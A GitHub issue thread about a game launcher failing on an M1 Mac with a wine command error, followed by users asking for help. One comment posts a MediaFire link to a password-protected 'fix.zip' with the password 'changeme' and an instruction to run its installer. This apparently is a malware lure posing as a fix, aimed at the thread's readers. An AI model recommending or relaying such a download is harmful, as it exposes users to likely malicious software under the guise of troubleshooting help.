### ISSUE TITLE
cant launch game

### ISSUE THREAD

**Issue by nystov** [yaagl/yet-another-anime-game-launcher#435]
cant launch the game...

it says:

Error: Command return non-zero code (1) 
WINEDEBUG=fixme-all,err-unwind,+timestamp WINEPREFIX=/Users/(myname)/Library/Application\ Support/Yaagl\ OS/wineprefix /Users/(myname)/Library/Application\ Support/Yaagl\ OS/wine/bin/wine64 cmd /c Z:\\Users\\(my name)\\Library\\Application\ Support\\Yaagl\ OS\\winedrv_config.bat &> /dev/null
StdOut:

StdErr:

**System Information (please complete the following information):**
 - macOS: 13.4.1 Ventura
 - Device: MacBook Air 13" 
 - CPU: Apple M1

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Soliturd** [comment]
i have the same issue if anyone can help
<img width="1264" alt="Screenshot 2024-08-29 at 10 05 15 PM" src="https://github.com/user-attachments/assets/9c123f2a-1e57-438f-a5b8-42e90bb729f7">
:(

**Comment by Soliturd** [comment]
name issue here, just blocking out my name in the screenshots. hoping someone can help. :( 
![legal name lol](https://github.com/user-attachments/assets/59bc2464-0090-4972-b3f3-70553eba933b)
